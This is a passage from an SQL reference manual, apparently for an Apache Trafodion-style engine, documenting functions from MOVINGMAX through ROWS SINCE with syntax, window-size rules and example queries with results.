The current window is defined\r\nas the current row and the previous (_integer-expression_ - 1) rows.\r\n\r\n* `_max-rows_`\r\n+\r\nis an SQL numeric value expression of signed data type SMALLINT or\r\nINTEGER that specifies the maximum number of rows in the current window.\r\n\r\nNote these considerations for the window size:\r\n\r\n* The actual value for the window size is the minimum of\r\n_integer-expression_ and _max-rows_.\r\n* If these conditions are met, MOVINGMAX returns the same result as\r\nRUNNINGMAX:\r\n** The _integer-expression_ is out of range, and _max-rows_ is not\r\nspecified. This condition includes the case in which both\r\n_integer-expression_ and _max-rows_ are larger than the result table.\r\n** The minimum of _integer-expression_ and _max-rows_ is out of range.\r\nIn this case, _integer-expression_ could be within range, but _max-rows_\r\nmight be the minimum value of the two and be out of range (for example,\r\na negative number).\r\n* The number of rows is out of range if it is larger than the size of\r\nthe result table, negative, or NULL.\r\n\r\n<<<\r\n[[examples_of_movingmax]]\r\n=== Examples of MOVINGMAX\r\n\r\n* Return the maximum of non-null values of a column in the current window\r\nof three rows:\r\n+\r\n```\r\nSELECT MOVINGMAX (I1,3) AS MOVINGMAX3\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\nMOVINGMAX3\r\n------------\r\n 6215\r\n 28174\r\n 28174\r\n 28174\r\n 11966\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[movingmin_function]]\r\n== MOVINGMIN Function\r\n\r\nThe MOVINGMIN function is a sequence function that returns the minimum\r\nof non-null values of a column in the current window of an intermediate\r\nresult table ordered by a SEQUENCE BY clause in a SELECT statement. See\r\n<<sequence_by_clause,SEQUENCE BY Clause>>.\r\n\r\nMOVINGMIN is a {project-name} SQL extension.\r\n\r\n```\r\nMOVINGMIN (column-expression, integer-expression [, max-rows])\r\n```\r\n\r\n* `_column-expression_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression.\r\n\r\n* `_integer-expression_`\r\n+\r\nis an SQL numeric value expression of signed data type SMALLINT or\r\nINTEGER that specifies the current window. The current window is defined\r\nas the current row and the previous (_integer-expression_ - 1) rows.\r\n\r\n* `_max-rows_`\r\n+\r\nis an SQL numeric value expression of signed data type SMALLINT or\r\nINTEGER that specifies the maximum number of rows in the current window.\r\n\r\nNote these considerations for the window size:\r\n\r\n* The actual value for the window size is the minimum of\r\n_integer-expression_ and _max-rows_.\r\n* If these conditions are met, MOVINGMIN returns the same result as\r\nRUNNINGMIN:\r\n** The _integer-expression_ is out of range, and _max-rows_ is not\r\nspecified. 
This condition includes the case in which both\r\n_integer-expression_ and _max-rows_ are larger than the result table.\r\n** The minimum of _integer-expression_ and _max-rows_ is out of range.\r\nIn this case, _integer-expression_ could be within range, but _max-rows_\r\nmight be the minimum value of the two and be out of range (for example,\r\na negative number).\r\n* The number of rows is out of range if it is larger than the size of\r\nthe result table, negative, or NULL.\r\n\r\n<<<\r\n[[examples_of_movingmin]]\r\n=== Examples of MOVINGMIN\r\n\r\n* Return the minimum of non-null values of a column in the current window\r\nof three rows:\r\n+\r\n```\r\nSELECT MOVINGMIN (I1,3) AS MOVINGMIN3\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\nMOVINGMIN3\r\n------------\r\n 6215\r\n 6215\r\n 6215\r\n 4597\r\n 4597\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[movingstddev_function]]\r\n== MOVINGSTDDEV Function\r\n\r\nThe MOVINGSTDDEV function is a sequence function that returns the\r\nstandard deviation of non-null values of a column in the current window\r\nof an intermediate result table ordered by a SEQUENCE BY clause in a\r\nSELECT statement. See <<sequence_by_clause,SEQUENCE BY Clause>>.\r\n\r\nMOVINGSTDDEV is a {project-name} SQL extension.\r\n\r\n```\r\nMOVINGSTDDEV (column-expression, integer-expression [, max-rows])\r\n```\r\n\r\n* `_column-expression_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression.\r\n\r\n* `_integer-expression_`\r\n+\r\nis an SQL numeric value expression of signed data type SMALLINT or\r\nINTEGER that specifies the current window. The current window is defined\r\nas the current row and the previous (_integer-expression_ - 1) rows.\r\n\r\n* `_max-rows_`\r\n+\r\nis an SQL numeric value expression of signed data type SMALLINT or\r\nINTEGER that specifies the maximum number of rows in the current window.\r\n\r\nNote these considerations for the window size:\r\n\r\n* The actual value for the window size is the minimum of\r\n_integer-expression_ and _max-rows_.\r\n* If these conditions are met, MOVINGSTDDEV returns the same result as\r\nRUNNINGSTDDEV:\r\n** The _integer-expression_ is out of range, and _max-rows_ is not\r\nspecified. This condition includes the case in which both\r\n_integer-expression_ and _max-rows_ are larger than the result table.\r\n** The minimum of _integer-expression_ and _max-rows_ is out of range.\r\nIn this case, _integer-expression_ could be within range, but _max-rows_\r\nmight be the minimum value of the two and be out of range (for example,\r\na negative number).\r\n* The number of rows is out of range if it is larger than the size of\r\nthe result table, negative, or NULL.\r\n\r\n<<<\r\n[[examples_of_movingstddev]]\r\n=== Examples of MOVINGSTDDEV\r\n\r\n* Return the standard deviation of non-null values of a column in the\r\ncurrent window of three rows:\r\n+\r\n```\r\nSELECT MOVINGSTDDEV (I1,3) AS MOVINGSTDDEV3\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\nMOVINGSTDDEV3\r\n-------------------------\r\n 0.00000000000000000E+000\r\n 1.55273578080753976E+004\r\n 1.48020166531456112E+004\r\n 1.51150124820766640E+004\r\n 6.03627542446499008E+003\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n* You can use the CAST function for display purposes. 
For example:\r\n+\r\n```\r\nSELECT CAST(MOVINGSTDDEV (I1,3) AS DEC (18,3))\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\n(EXPR)\r\n--------------------\r\n .000\r\n 15527.357\r\n 14802.016\r\n 15115.012\r\n 6036.275\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[movingsum_function]]\r\n== MOVINGSUM Function\r\n\r\nThe MOVINGSUM function is a sequence function that returns the sum of\r\nnon-null values of a column in the current window of an intermediate\r\nresult table ordered by a SEQUENCE BY clause in a SELECT statement. See\r\n<<sequence_by_clause,SEQUENCE BY Clause>>.\r\n\r\nMOVINGSUM is a {project-name} SQL extension.\r\n\r\n```\r\nMOVINGSUM (column-expression, integer-expression [, max-rows])\r\n```\r\n\r\n* `_column-expression_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression.\r\n\r\n* `_integer-expression_`\r\n+\r\nis an SQL numeric value expression of signed data type SMALLINT or\r\nINTEGER that specifies the current window. The current window is defined\r\nas the current row and the previous (_integer-expression_ - 1) rows.\r\n\r\n* `_max-rows_`\r\n+\r\nis an SQL numeric value expression of signed data type SMALLINT or\r\nINTEGER that specifies the maximum number of rows in the current window.\r\n\r\nNote these considerations for the window size:\r\n\r\n* The actual value for the window size is the minimum of\r\n_integer-expression_ and _max-rows_.\r\n* If these conditions are met, MOVINGSUM returns the same result as\r\nRUNNINGSUM:\r\n** The _integer-expression_ is out of range, and _max-rows_ is not\r\nspecified. This condition includes the case in which both\r\n_integer-expression_ and _max-rows_ are larger than the result table.\r\n** The minimum of _integer-expression_ and _max-rows_ is out of range.\r\nIn this case, _integer-expression_ could be within range, but _max-rows_\r\nmight be the minimum value of the two and be out of range (for example,\r\na negative number).\r\n* The number of rows is out of range if it is larger than the size of\r\nthe result table, negative, or NULL.\r\n\r\n<<<\r\n[[examples_of_movingsum]]\r\n=== Examples of MOVINGSUM\r\n\r\n* Return the sum of non-null values of a column in the current window of\r\nthree rows:\r\n+\r\n```\r\nSELECT MOVINGSUM (I1,3) AS MOVINGSUM3\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\nMOVINGSUM3\r\n------------\r\n 6215\r\n 34389\r\n 34389\r\n 32771\r\n 16563\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[movingvariance_function]]\r\n== MOVINGVARIANCE Function\r\n\r\nThe MOVINGVARIANCE function is a sequence function that returns the\r\nvariance of non-null values of a column in the current window of an\r\nintermediate result table ordered by a SEQUENCE BY clause in a SELECT\r\nstatement. See <<sequence_by_clause,SEQUENCE BY Clause>>.\r\n\r\nMOVINGVARIANCE is a {project-name} SQL extension.\r\n\r\n```\r\nMOVINGVARIANCE (column-expression, integer-expression [, max-rows])\r\n```\r\n\r\n* `_column-expression_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression.\r\n\r\n* `_integer-expression_`\r\n+\r\nis an SQL numeric value expression of signed data type SMALLINT or\r\nINTEGER that specifies the current window. 
The current window is defined
as the current row and the previous (_integer-expression_ - 1) rows.

* `_max-rows_`
+
is an SQL numeric value expression of signed data type SMALLINT or
INTEGER that specifies the maximum number of rows in the current window.

Note these considerations for the window size:

* The actual value for the window size is the minimum of
_integer-expression_ and _max-rows_.
* If these conditions are met, MOVINGVARIANCE returns the same result as
RUNNINGVARIANCE:
** The _integer-expression_ is out of range, and _max-rows_ is not
specified. This condition includes the case in which both
_integer-expression_ and _max-rows_ are larger than the result table.
** The minimum of _integer-expression_ and _max-rows_ is out of range.
In this case, _integer-expression_ could be within range, but _max-rows_
might be the minimum value of the two and be out of range (for example,
a negative number).
* The number of rows is out of range if it is larger than the size of
the result table, negative, or NULL.

<<<
[[examples_of_movingvariance]]
=== Examples of MOVINGVARIANCE

* Return the variance of non-null values of a column in the current window
of three rows:
+
```
SELECT MOVINGVARIANCE (I1,3) AS MOVINGVARIANCE3
FROM mining.seqfcn SEQUENCE BY ts;

MOVINGVARIANCE3
-------------------------
 0.00000000000000000E+000
 2.41098840499999960E+008
 2.19099696999999968E+008
 2.28463602333333304E+008
 3.64366210000000016E+007

--- 5 row(s) selected.
```

* You can use the CAST function for display purposes. For example:
+
```
SELECT CAST(MOVINGVARIANCE (I1,3) AS DEC (18,3))
FROM mining.seqfcn SEQUENCE BY ts;

(EXPR)
--------------------
 .000
 241098840.500
 219099697.000
 228463602.333
 36436621.000

--- 5 row(s) selected.
```

<<<
[[nullif_function]]
== NULLIF Function

The NULLIF function compares the value of two expressions. Both
expressions must be of comparable types. The return value is NULL when
the two expressions are equal. Otherwise, the return value
is the value of the first expression.

```
NULLIF(expr1, expr2)
```

* `_expr1_`
+
an expression to be compared.

* `_expr2_`
+
an expression to be compared.

NULLIF(_expr1_, _expr2_) is equivalent to:

```
CASE
 WHEN expr1 = expr2 THEN NULL
 ELSE expr1
END
```

NULLIF returns NULL if both arguments are equal. The return value is
the value of the first argument when the two expressions are not equal.

[[examples_of_nullif]]
=== Examples of NULLIF

* This function returns a null if the _value_ is equal to 7. The return
value is the value of the first argument when that value is not 7.
+
```
NULLIF(value,7)
```
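* A common use of NULLIF is to guard division against a zero divisor by
turning it into NULL instead of raising an error. This is a minimal
sketch with hypothetical column and table names:
+
```
SELECT total_price / NULLIF(qty_ordered, 0) FROM orders_tab;
```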
<<<
[[nullifzero_function]]
== NULLIFZERO Function

The NULLIFZERO function returns the value of the expression if that
value is not zero. It returns NULL if the value of the expression is
zero.

```
NULLIFZERO (expression)
```

* `_expression_`
+
specifies a value expression. It must be a numeric data type.

<<<
[[examples_of_nullifzero]]
=== Examples of NULLIFZERO

* This function returns the value of the column named salary for each
row where the column's value is not zero. It returns a NULL for each row
where the column's value is zero.
+
```
SELECT NULLIFZERO(salary) FROM employee_tab;
```

* This function returns a value of 1 for each row of the table:
+
```
SELECT NULLIFZERO(1) FROM employee_tab;
```

* This function returns a value of NULL for each row of the table:
+
```
SELECT NULLIFZERO(0) FROM employee_tab;
```

<<<
[[nvl_function]]
== NVL Function

The NVL function determines whether the selected column has a null value
and, if so, returns the _new-operand_ value; otherwise, the _operand_
value is returned.

```
NVL (operand, new-operand)
```

* `_operand_`
+
specifies a value expression.

* `_new-operand_`
+
specifies a value expression. _operand_ and _new-operand_ must be
comparable data types.

If _operand_ is a null value, NVL returns _new-operand_. If _operand_
is not a null value, NVL returns _operand_.

The _operand_ and _new-operand_ can be a column name, subquery,
{project-name} SQL string functions, math functions, or constant values.

[[examples_of_nvl]]
=== Examples of NVL

* This function returns a value of z:
+
```
SELECT NVL(CAST(NULL AS CHAR(1)), 'z') FROM (VALUES(1)) x(a);

(EXPR)
------
"z"

--- 1 row(s) selected.
```

* This function returns a value of 1:
+
```
SELECT NVL(1, 2) FROM (VALUES(0)) x(a);

(EXPR)
-------
 1

--- 1 row(s) selected.
```

* This function returns a value of 9999999 for the null value in the
column named a1:
+
```
SELECT NVL(a1, 9999999) from t1;

(EXPR)
-------
 123
 34
9999999

--- 3 row(s) selected.

select * from t1;

A1
-------
 123
 34
 ?

--- 3 row(s) selected.
```

<<<
[[octet_length_function]]
== OCTET_LENGTH Function

The OCTET_LENGTH function returns the length of a character string in
bytes.

```
OCTET_LENGTH (string-value-expression)
```

* `_string-value-expression_`
+
specifies the string value expression for which to return the length in
bytes. {project-name} SQL returns the result as a 2-byte signed integer with
a scale of zero. If _string-value-expression_ is null, {project-name} SQL returns
a length of zero.
See <<character_value_expressions,Character Value Expressions>>.

[[considerations_for_octet_length]]
=== Considerations for OCTET_LENGTH

[[char_and_varchar_operands_1]]
==== CHAR and VARCHAR Operands

For a column declared as fixed CHAR, {project-name} SQL returns the length of
that column as the maximum number of storage bytes. For a VARCHAR
column, {project-name} SQL returns the length of the string stored in that
column as the actual number of storage bytes.

[[similarity_to_char_length_function]]
==== Similarity to CHAR_LENGTH Function

The OCTET_LENGTH and CHAR_LENGTH functions are similar. The OCTET_LENGTH
function returns the number of bytes, rather than the number of
characters, in the string. This distinction is important for multi-byte
implementations. For an example of selecting a double-byte column, see
<<examples_of_octet_length,Examples of OCTET_LENGTH>>.

[[examples_of_octet_length]]
=== Examples of OCTET_LENGTH

* If a character string is stored as two bytes for each character, this
function returns the value 12. Otherwise, the function returns 6:
+
```
OCTET_LENGTH ('Robert')
```
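* The byte-versus-character distinction can be seen by comparing the two
length functions side by side. This is a hedged sketch: _c_ is a
hypothetical UTF8 column in a hypothetical table _t_ holding the
four-character value 'café', whose accented character occupies two
bytes, so OCTET_LENGTH returns 5 while CHAR_LENGTH returns 4:
+
```
SELECT OCTET_LENGTH(c), CHAR_LENGTH(c) FROM t;
```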
<<<
[[offset_function]]
== OFFSET Function

The OFFSET function is a sequence function that retrieves columns from
previous rows of an intermediate result table ordered by a SEQUENCE BY
clause in a SELECT statement. See <<sequence_by_clause,SEQUENCE BY Clause>>.

OFFSET is a {project-name} SQL extension.

```
OFFSET ( column-expression , number-rows [, max-rows ])
```

* `_column-expression_`
+
specifies a derived column determined by the evaluation of the column
expression.

* `_number-rows_`
+
is an SQL numeric value expression of signed data type SMALLINT or
INTEGER that specifies the offset as the number of rows from the current
row. If the number of rows exceeds _max-rows_, OFFSET returns
OFFSET(_column-expression_,_max-rows_). If the number of rows is out
of range and _max-rows_ is not specified or is out of range, OFFSET
returns null. The number of rows is out of range if it is larger than
the size of the result table, negative, or NULL.

* `_max-rows_`
+
is an SQL numeric value expression of signed data type SMALLINT or
INTEGER that specifies the maximum number of rows of the offset.

[[examples_of_offset]]
=== Examples of OFFSET

* Retrieve the I1 column offset by three rows:
+
```
SELECT OFFSET(I1,3) AS offset3
FROM mining.seqfcn SEQUENCE BY ts;

offset3
------------
 ?
 ?
 ?
 6215
 28174

--- 5 row(s) selected.
```
+
The first three rows retrieved display null because the offset from the
current row does not fall within the result table.

<<<
[[pi_function]]
== PI Function

The PI function returns the constant value of pi as a floating-point
value.

PI is a {project-name} SQL extension.

```
PI()
```

[[examples_of_pi]]
=== Examples of PI

* This constant function returns the value 3.14159260000000000E+000:
+
```
PI()
```

<<<
[[position_function]]
== POSITION Function

The POSITION function searches for a given substring in a character
string. If the substring is found, {project-name} SQL returns the character
position of the substring within the string. Every character, including
multi-byte characters, is treated as one character. The result returned
by the POSITION function is equal to the result returned by the
<<locate_function,LOCATE Function>>.

```
POSITION (substring-expression IN source-expression)
```

* `_substring-expression_`
+
is an SQL character value expression that specifies the substring to
search for in _source-expression_. The _substring-expression_ cannot be NULL.
See <<character_value_expressions,Character Value Expressions>>.

* `_source-expression_`
+
is an SQL character value expression that specifies the source string.
The _source-expression_ cannot be NULL.
See <<character_value_expressions,Character Value Expressions>>.

{project-name} SQL returns the result as a 2-byte signed integer with a scale
of zero. If _substring-expression_ is not found in _source-expression_,
{project-name} SQL returns zero.
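As a quick sketch of the equivalence with LOCATE noted above, these two
expressions both return 8:

```
POSITION ('John' IN 'Robert John Smith')
LOCATE ('John','Robert John Smith')
```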
[[considerations_for_position]]
=== Considerations for POSITION

[[result_of_position]]
==== Result of POSITION

If the length of _source-expression_ is zero and the length of
_substring-expression_ is greater than zero, {project-name} SQL returns 0. If
the length of _substring-expression_ is zero, {project-name} SQL returns 1.

If the length of _substring-expression_ is greater than the length of
_source-expression_, {project-name} SQL returns zero. If
_source-expression_ is a null value, {project-name} SQL returns a null value.

[[using_the_upshift_function]]
==== Using the UPSHIFT Function

To ignore case in the search, use the UPSHIFT function (or the LOWER
function) for both the _substring-expression_ and the _source-expression_.

[[examples_of_position]]
=== Examples of POSITION

* This function returns the value 8 for the position of the substring
'John' within the string:
+
```
POSITION ('John' IN 'Robert John Smith')
```

* Suppose that the EMPLOYEE table has an EMPNAME column that contains
both the first and last names. Return all records in table EMPLOYEE that
contain the substring 'Smith' regardless of whether the column value is
in uppercase or lowercase characters:
+
```
SELECT * FROM persnl.employee
WHERE POSITION ('SMITH' IN UPSHIFT(empname)) > 0 ;
```

<<<
[[power_function]]
== POWER Function

The POWER function returns the value of a numeric value expression
raised to the power of an integer value expression. You can also use the
exponential operator \*\*.

POWER is a {project-name} SQL extension.

```
POWER (numeric-expression-1, numeric-expression-2)
```

* `_numeric-expression-1_, _numeric-expression-2_`
+
are SQL numeric value expressions that specify the values for the base
and exponent arguments of the POWER function. See
<<numeric_value_expressions,Numeric Value Expressions>>.
+
If the base _numeric-expression-1_ is zero, the exponent
_numeric-expression-2_ must be greater than zero, and the result is zero.
If the exponent is zero, the base cannot be 0, and the result is 1. If the
base is negative, the exponent must be a value with an exact numeric data
type and a scale of zero.

[[examples_of_power]]
=== Examples of POWER

* Return the value 15.625:
+
```
POWER (2.5,3)
```

* Return the value 27. Raising to the power of 2 with POWER is the
inverse of the SQRT function:
+
```
POWER (SQRT(27),2)
```
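* Return the value 15.625, using the equivalent exponential operator form
of the first example:
+
```
2.5 ** 3
```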
<<<
[[quarter_function]]
== QUARTER Function

The QUARTER function converts a DATE or TIMESTAMP expression into an
INTEGER value in the range 1 through 4 that represents the corresponding
quarter of the year. Quarter 1 represents January 1 through March 31,
and so on.

QUARTER is a {project-name} SQL extension.

```
QUARTER (datetime-expression)
```

* `_datetime-expression_`
+
is an expression that evaluates to a datetime value of type DATE or
TIMESTAMP. See <<datetime_value_expressions,Datetime Value Expressions>>.

[[examples_of_quarter]]
=== Examples of QUARTER

* Return an integer that represents the quarter of the year from the
START_DATE column in the PROJECT table:
+
```
SELECT start_date, ship_timestamp, QUARTER(start_date)
FROM persnl.project
WHERE projcode = 1000;

Start/Date Time/Shipped (EXPR)
---------- -------------------------- ------
2008-04-10 2008-04-21 08:15:00.000000 2
```

<<<
[[radians_function]]
== RADIANS Function

The RADIANS function converts a numeric value expression (expressed in
degrees) to the number of radians.

RADIANS is a {project-name} SQL extension.

```
RADIANS (numeric-expression)
```

* `_numeric-expression_`
+
is an SQL numeric value expression that specifies the value for the
argument of the RADIANS function.
See <<numeric_value_expressions,Numeric Value Expressions>>.

[[examples_of_radians]]
=== Examples of RADIANS

* Return the value 7.85398150000000000E-001, or approximately 0.78540
radians, for 45 degrees:
+
```
RADIANS (45)
```

* Return the value 45 in degrees. The function DEGREES is the inverse of
the function RADIANS:
+
```
DEGREES (RADIANS (45))
```

<<<
[[runningrank_function]]
== RANK/RUNNINGRANK Function

The RANK/RUNNINGRANK function is a sequence function that returns the
rank of the given value of an intermediate result table ordered by a
SEQUENCE BY clause in a SELECT statement. RANK is an alternative syntax
for RUNNINGRANK.

RANK/RUNNINGRANK is a {project-name} SQL extension.

```
RUNNINGRANK(expression) | RANK(expression)
```

* `_expression_`
+
specifies the expression on which to perform the rank.

RANK/RUNNINGRANK returns the rank of the expression within the
intermediate result table. The definition of rank is as follows:

```
RANK = 1 for the first value of the intermediate result table.

= the previous value of RANK if the previous value of expression is
the same as the current value of expression.

= RUNNINGCOUNT(*) otherwise.
```

In other words, RANK starts at 1. Values that are equal have the same
rank. The value of RANK advances to the relative position of the row in
the intermediate result when the value changes.

[[considerations_for_runningrank]]
=== Considerations for RANK/RUNNINGRANK

[[sequence_order_dependency]]
==== Sequence Order Dependency

The RUNNINGRANK function is meaningful only when the given expression is
the leading column of the SEQUENCE BY clause. This is because the
RUNNINGRANK function assumes that the values of expression are in order
and that like values are contiguous. If an ascending order is specified
for expression in the SEQUENCE BY clause, then the RUNNINGRANK function
assigns a rank of 1 to the lowest value of expression.
If a descending
order is specified for expression in the SEQUENCE BY clause, then the
RUNNINGRANK function assigns a rank of 1 to the highest value of
expression.

[[runningrank_null_values]]
==== NULL Values

For the purposes of RUNNINGRANK, NULL values are considered to be equal.

[[examples_of_runningrank]]
=== Examples of RANK/RUNNINGRANK

* Suppose that _seqfcn_ has been created as:
+
```
CREATE TABLE cat.sch.seqfcn (i1 INTEGER, i2 INTEGER);
```
+
The table SEQFCN has columns _i1_ and _i2_ with data:
+
[cols="15%,85%",options="header"]
|===
| i1 | i2
| 1 | 100
| 3 | 200
| 4 | 100
| 2 | 200
| 5 | 300
| 6 | 200
| 8 | null
| 10 | null
|===

* Return the rank of _i1_:
+
```
SELECT i1, RUNNINGRANK(i1) AS rank
FROM cat.sch.seqfcn SEQUENCE BY i1;

i1 rank
----------- --------------------
 1 1
 2 2
 3 3
 4 4
 5 5
 6 6
 8 7
 10 8

--- 8 row(s) selected.
```

<<<
* Return the rank of _i1_ descending:
+
```
SELECT i1, RUNNINGRANK (i1) AS rank
FROM cat.sch.seqfcn SEQUENCE BY i1 DESC;

i1 rank
----------- --------------------
 10 1
 8 2
 6 3
 5 4
 4 5
 3 6
 2 7
 1 8

--- 8 row(s) selected.
```

* Return the rank of _i2_, using the alternative RANK syntax:
+
```
SELECT i2, RANK (i2) AS rank
FROM cat.sch.seqfcn SEQUENCE BY i2;

i2 rank
----------- --------------------
 100 1
 100 1
 200 3
 200 3
 200 3
 300 6
 ? 7
 ? 7

--- 8 row(s) selected.
```
+
Notice that the two NULL values received the same rank.

<<<
* Return the rank of _i2_ descending, using the alternative RANK syntax:
+
```
SELECT i2, RANK (i2) AS rank
FROM cat.sch.seqfcn SEQUENCE BY i2 DESC;

i2 rank
----------- --------------------
 ? 1
 ? 1
 300 3
 200 4
 200 4
 200 4
 100 7
 100 7

--- 8 row(s) selected.
```

* Return the rank of _i2_ descending, excluding NULL values:
+
```
SELECT i2, RANK (i2) AS rank
FROM cat.sch.seqfcn WHERE i2 IS NOT NULL SEQUENCE BY i2 DESC;

i2 rank
----------- --------------------
 300 1
 200 2
 200 2
 200 2
 100 5
 100 5

--- 6 row(s) selected.
```

<<<
[[repeat_function]]
== REPEAT Function

The REPEAT function returns a character string composed of the
evaluation of a character expression repeated a specified number of
times.

REPEAT is a {project-name} SQL extension.

```
REPEAT (character-expr, count)
```

* `_character-expr_`
+
specifies the source string from which to return the specified number of
repeated strings. The source string is an SQL character value expression.
The operand is the result of evaluating _character-expr_.
See <<character_value_expressions,Character Value Expressions>>.

* `_count_`
+
specifies the number of times the source string _character-expr_ is to
be repeated.
The number _count_ must be a value of exact numeric data type, greater
than or equal to zero, with a scale of zero.

[[examples_of_repeat]]
=== Examples of REPEAT

* Return this quote from Act 5, Scene 3, of King Lear:
+
```
REPEAT ('Never,', 5)

Never,Never,Never,Never,Never,
```

<<<
[[replace_function]]
== REPLACE Function

The REPLACE function returns a character string where all occurrences of
a specified character string in the original string are replaced with
another character string. All three character value expressions must be
comparable types. The return value is the VARCHAR type.

REPLACE is a {project-name} SQL extension.

```
REPLACE (char-expr-1, char-expr-2, char-expr-3)
```

* `_char-expr-1_, _char-expr-2_, _char-expr-3_`
+
are SQL character value expressions. The operands are the result of
evaluating the character expressions. All occurrences of _char-expr-2_
in _char-expr-1_ are replaced by _char-expr-3_.
See <<character_value_expressions,Character Value Expressions>>.

[[examples_of_replace]]
=== Examples of REPLACE

* Use the REPLACE function to change job descriptions so that occurrences
of the company name are updated:
+
```
SELECT jobdesc FROM persnl.job;

Job Description
------------------
MANAGER COMNET
PRODUCTION COMNET
ASSEMBLER COMNET
SALESREP COMNET
SYSTEM ANAL COMNET
...

--- 10 row(s) selected.

UPDATE persnl.job
SET jobdesc = REPLACE(jobdesc, 'COMNET', 'TDMNET');

SELECT jobdesc FROM persnl.job;

Job Description
------------------
MANAGER TDMNET
PRODUCTION TDMNET
ASSEMBLER TDMNET
SALESREP TDMNET
SYSTEM ANAL TDMNET
...

--- 10 row(s) selected.
```

<<<
[[right_function]]
== RIGHT Function

The RIGHT function returns the rightmost specified number of characters
from a character expression. Every character, including multi-byte
characters, is treated as one character.

RIGHT is a {project-name} SQL extension.

```
RIGHT (character-expr, count)
```

* `_character-expr_`
+
specifies the source string from which to return the rightmost specified
number of characters. The source string is an SQL character value expression.
The operand is the result of evaluating _character-expr_.
See <<character_value_expressions,Character Value Expressions>>.

* `_count_`
+
specifies the number of characters to return from _character-expr_.
The number _count_ must be a value of exact numeric data type with a scale
of zero.

[[examples_of_right]]
=== Examples of RIGHT

* Return 'smith':
+
```
RIGHT('robert_john_smith', 5)
```

* Suppose that a six-character company literal has been concatenated as
the first six characters to the job descriptions in the JOB table. Use
the RIGHT function to remove the company literal from the job
descriptions:
+
```
UPDATE persnl.job
SET jobdesc = RIGHT (jobdesc, 12);
```

<<<
[[round_function]]
== ROUND Function

The ROUND function returns the value of _numeric-expr_ rounded to _num_
places to the right of the decimal point.

ROUND is a {project-name} SQL extension.

```
ROUND(numeric-expr [ , num ] )
```

* `_numeric-expr_`
+
is an SQL numeric value expression.

* `_num_`
+
specifies the number of places to the right of the decimal point for
rounding.
If _num_ is a negative number, all places to the right of the
decimal point and _num_ places to the left of the decimal point are
zeroed. If _num_ is not specified or is 0, then all places to the right
of the decimal point are zeroed.
+
For any exact numeric value, the value _numeric-expr_ is rounded away
from 0 (for example, to x+1 when x.5 is positive and to x-1 when x.5 is
negative). For the inexact numeric values (real, float, and double) the
value _numeric-expr_ is rounded toward the nearest even number.

<<<
[[examples_of_round]]
=== Examples of ROUND

* This function returns the value 123.46:
+
```
ROUND(123.4567,2)
```

* This function returns the value 123:
+
```
ROUND(123.4567,0)
```

* This function returns the value 120:
+
```
ROUND(123.4567,-1)
```

* This function returns the value 0:
+
```
ROUND(999.0,-4)
```

* This function returns the value 1000:
+
```
ROUND(999.0,-3)
```

* This function returns the value 2.0E+000:
+
```
ROUND(1.5E+000,0)
```

* This function returns the value 2.0E+000:
+
```
ROUND(2.5E+000,0)
```

* This function returns the value 1.0E+000:
+
```
ROUND(1.4E+000,0)
```

<<<
[[rows_since_function]]
== ROWS SINCE Function

The ROWS SINCE function is a sequence function that returns the number
of rows counted since the specified condition was last true in the
intermediate result table ordered by a SEQUENCE BY clause in a SELECT
statement. See <<sequence_by_clause,SEQUENCE BY Clause>>.

ROWS SINCE is a {project-name} SQL extension.

```
ROWS SINCE [INCLUSIVE] (condition [, max-rows])
```

* `INCLUSIVE`
+
specifies the current row is to be considered. If you specify INCLUSIVE,
the condition is evaluated in the current row. Otherwise, the condition
is evaluated beginning with the previous row. If you specify INCLUSIVE
and the condition is true in the current row, ROWS SINCE returns 0.

* `_condition_`
+
specifies a condition to be considered for each row in the result table.
Each column in _condition_ must be a column that exists in the result
table. If the condition has never been true for the result table, ROWS
SINCE returns null.

* `_max-rows_`
+
is an SQL numeric value expression of signed data type SMALLINT or
INTEGER that specifies the maximum number of rows from the current row
to consider. If the condition has never been true for _max-rows_ from
the current row, or if _max-rows_ is negative or null, ROWS SINCE
returns null.

[[considerations_for_rows_since]]
=== Considerations for ROWS SINCE

[[counting_the_rows]]
==== Counting the Rows

If you specify INCLUSIVE, the condition in each row of the result table
is evaluated starting with the current row as row 0 (zero) (up to the
maximum number of rows or the size of the result table). Otherwise, the
condition is evaluated starting with the previous row as row 1.

If a row is reached where the condition is true, ROWS SINCE returns the
number of rows counted so far.
Otherwise, if the condition is never true\r\nwithin the result table being considered, ROWS SINCE returns null.\r\n{project-name} SQL then goes to the next row as the new current row.\r\n\r\n[[examples_of_rows_since]]\r\n=== Examples of ROWS SINCE\r\n\r\n* Return the number of rows since the condition _i1 IS NULL_ became true:\r\n+\r\n```\r\nSELECT ROWS SINCE (i1 IS NULL) AS rows_since_null\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\nrows_since_null\r\n---------------\r\n ?\r\n ?\r\n 1\r\n 2\r\n 1\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n* Return the number of rows since the condition _i1 < i2_ became true:\r\n+\r\n```\r\nSELECT ROWS SINCE (i1<i2), ROWS SINCE INCLUSIVE (i1<i2)\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\n(EXPR) (EXPR)\r\n--------------- ---------------\r\n ? 0\r\n 1 1\r\n 2 0\r\n 1 1\r\n 2 0\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[rows_since_changed_function]]\r\n== ROWS SINCE CHANGED Function\r\n\r\nThe ROWS SINCE CHANGED function is a sequence function that returns the\r\nnumber of rows counted since the specified set of values last changed in\r\nthe intermediate result table ordered by a SEQUENCE BY clause in a\r\nSELECT statement. See <<sequence_by_clause,SEQUENCE BY Clause>>.\r\n\r\nROWS SINCE CHANGED is a {project-name} SQL 